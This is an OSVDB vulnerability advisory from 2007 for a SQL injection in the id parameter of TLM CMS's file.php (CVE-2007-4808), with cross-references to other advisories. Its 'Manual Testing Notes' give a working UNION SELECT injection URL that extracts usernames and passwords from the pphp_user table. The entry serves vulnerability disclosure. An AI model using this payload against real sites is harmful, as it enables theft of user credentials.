TLM CMS file.php id Variable SQL Injection

2007-09-08T00:00:00
ID OSVDB:37003
Type osvdb
Reporter OSVDB
Modified 2007-09-08T00:00:00

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.

Manual Testing Notes

http://[target]/tlmcms32/file.php?action=voir&id=-9'UNION%20SELECT%200,0,0,US_pseudo,0,US_pwd,0,0,0,0%20from%20pphp_user/*

References:

Secunia Advisory ID:26752 Related OSVDB ID: 37001 Related OSVDB ID: 37002 Related OSVDB ID: 37005 Related OSVDB ID: 37004 Related OSVDB ID: 37006 Other Advisory URL: http://milw0rm.com/exploits/4376 ISS X-Force ID: 36536 FrSIRT Advisory: ADV-2007-3137 CVE-2007-4808 Bugtraq ID: 25602